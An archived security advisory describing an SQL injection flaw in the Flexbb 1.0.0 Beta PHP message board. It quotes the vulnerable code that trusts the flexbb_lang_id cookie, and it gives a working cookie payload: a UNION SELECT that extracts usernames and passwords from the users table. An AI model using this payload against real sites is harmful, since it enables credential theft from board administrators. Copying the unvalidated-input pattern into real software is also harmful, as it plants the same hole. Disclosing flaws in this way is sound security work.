Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: tb10106.htm

Flexbb Sql Injection
- Flexbb Sql Injection
- Flexbb Sql Injection

KAPDA New advisory
Vulnerable Version: 1.0.0 10005 Beta Release 1
Bug: SQL Injection
Exploitation: Remote with browser

Flexbb is a  freely available PHP-based message board
program that uses a MySQL database.

Sql Injection:
The software does not properly validate user-supplied
input that may allow a remote user to launch Sql
injection attacks.
There are multiple Input Validation errors, for
// Code Snippet
// Includes/Start.php
// Lines #190-197
if($_COOKIE['flexbb_lang_id'] == "")
	$lang_id = $config['default_lang_id'];
	$lang_id = $_COOKIE['flexbb_lang_id'];  //--->Input
Validation Error

Condition: Magic quotes GPC = Off
Cookie Name =  flexbb_lang_id
Cookie Value =  none' UNION SELECT 'en',`username`,
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4

original Advisory:

No response from vendor, there is no solution at the
time of this entry.

Credit :
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran

TV dinner still cooling? 
Check out "Tonight's Picks" on Yahoo! TV. 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH